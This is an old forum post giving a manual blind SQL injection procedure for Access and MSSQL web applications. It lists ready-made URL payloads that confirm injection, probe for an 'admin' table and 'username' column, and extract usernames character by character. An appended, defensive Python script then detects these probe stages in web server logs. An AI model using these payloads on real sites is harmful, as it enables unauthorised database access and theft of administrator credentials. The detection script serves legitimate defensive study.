Posted on 2006-9-27 21:56:05
<P align=center><A name=top><B>Rough procedure for manually testing whether injection is possible</B></A></P>
<P>□ Test whether injection is possible<BR>==============================================================================<BR>http://url/xx?id=1111 and 1=1 (normal page)<BR>http://url/xx?id=1111 and 1=2 (error page)</P>
<P>==============================================================================<BR>□ Test for the table<BR>==============================================================================<BR>http://url/xx?id=1111 and exists (select * from admin)</P>
<P>==============================================================================<BR>□ Test for the column<BR>==============================================================================<BR>http://url/xx?id=1111 and exists (select username from admin)</P>
<P>==============================================================================<BR>□ Test the ID<BR>==============================================================================<BR>http://url/xx?id=1111 and exists (select id from admin where ID=1)</P>
<P>==============================================================================<BR>□ Test the length<BR>==============================================================================<BR>http://url/xx?id=1111 and exists (select id from admin where len(username)=5 and ID=1)</P>
<P>==============================================================================<BR>□ Test whether the database is MSSQL<BR>==============================================================================<BR>http://url/xx?id=1111 and exists (select * from sysobjects)</P>
<P>==============================================================================<BR>□ Test whether the character is English<BR>==============================================================================<BR>(ACCESS database)<BR>http://url/xx?id=1111 and exists (select id from admin where asc(mid(username,1,1)) between 30 and 130 and ID=1)</P>
<P>(MSSQL database)<BR>http://url/xx?id=1111 and exists (select id from admin where unicode(substring(username,1,1)) between 30 and 130 and ID=1)</P>
<P>==============================================================================<BR>□ Narrow down the range of the English character<BR>==============================================================================<BR>(ACCESS database)<BR>http://url/xx?id=1111 and exists (select id from admin where asc(mid(username,1,1)) between 90 and 100 and ID=1)</P>
<P>(MSSQL database)<BR>http://url/xx?id=1111 and exists (select id from admin where unicode(substring(username,1,1)) between 90 and 100 and ID=1)</P>
<P>==============================================================================<BR>□ Test which character it is<BR>==============================================================================<BR>(ACCESS database)<BR>http://url/xx?id=1111 and exists (select id from admin where asc(mid(username,1,1))=97 and ID=1)</P>
<P>(MSSQL database)<BR>http://url/xx?id=1111 and exists (select id from admin where unicode(substring(username,1,1))=97 and ID=1)</P>
<P>==============================================================================<BR>Common functions<BR>==============================================================================<BR>Access: asc(character) SQLServer: unicode(character)<BR>Purpose: returns the ASCII code of a character</P>
<P>Access: chr(number) SQLServer: nchar(number)<BR>Purpose: the inverse of asc; returns the character for a given ASCII code</P>
<P>Access: mid(string,N,L) SQLServer: substring(string,N,L)<BR>Purpose: returns the substring of length L starting at character N of the string, i.e. the characters between N and N+L</P>
<P>Access: abs(number) SQLServer: abs(number)<BR>Purpose: returns the absolute value of a number (used when guessing Chinese characters)</P>
<P>Access: A between B And C SQLServer: A between B And C<BR>Purpose: tests whether A lies between B and C</P>
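From the defender's side, the request sequence above leaves a recognizable trail in web server logs. The following is an added example, not part of the original post: it classifies query strings into the probing stages listed above and reports clients that show several stages. The log layout, IP addresses, stage names and the `min_stages` threshold are assumptions made for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Signatures derived from the probe strings in the post; most specific first.
STAGES = [
    ("char_extraction", re.compile(r"\b(?:asc|unicode)\s*\(\s*(?:mid|substring)\s*\(", re.I)),
    ("length_probe", re.compile(r"\blen\s*\(\s*\w+\s*\)\s*(?:=|<|>|between)", re.I)),
    ("mssql_fingerprint", re.compile(r"\bfrom\s+sysobjects\b", re.I)),
    ("schema_probe", re.compile(r"\band\s+exists\s*\(\s*select\b", re.I)),
    ("boolean_test", re.compile(r"\band\s+\d+\s*=\s*\d+", re.I)),
]

def classify(query):
    """Return the probing stage a raw (URL-encoded) query string matches, or None."""
    decoded = unquote_plus(query)  # handles both %20 and + as spaces
    for name, pattern in STAGES:
        if pattern.search(decoded):
            return name
    return None

def probing_clients(log_lines, min_stages=2):
    """Map client IP -> distinct stages in first-seen order, for clients with >= min_stages."""
    seen = defaultdict(list)
    for line in log_lines:
        fields = line.split()
        if line.startswith("#") or len(fields) < 7:
            continue  # skip W3C header lines and malformed records
        ip, query = fields[2], fields[5]
        stage = classify(query)
        if stage and stage not in seen[ip]:
            seen[ip].append(stage)
    return {ip: stages for ip, stages in seen.items() if len(stages) >= min_stages}

# Constructed sample log, not real traffic (fields: date time c-ip method stem query status).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2006-09-27 21:50:05 203.0.113.7 GET /xx id=1111%20and%201=1 200
2006-09-27 21:50:06 203.0.113.7 GET /xx id=1111%20and%201=2 500
2006-09-27 21:50:20 203.0.113.7 GET /xx id=1111+AND+EXISTS+(select+*+from+admin) 200
2006-09-27 21:50:41 203.0.113.7 GET /xx id=1111+and+exists+(select+id+from+admin+where+len(username)=5+and+ID=1) 200
2006-09-27 21:51:02 203.0.113.7 GET /xx id=1111+and+exists+(select+id+from+admin+where+asc(mid(username,1,1))=97+and+ID=1) 200
2006-09-27 21:52:00 198.51.100.4 GET /xx id=42 200
2006-09-27 21:52:09 198.51.100.4 GET /search q=black+and+white 200
""".splitlines()

if __name__ == "__main__":
    print(probing_clients(SAMPLE_LOG))
```

Requiring more than one distinct stage per client keeps a single stray match, such as a search phrase containing "and 1=1", from raising an alert on its own.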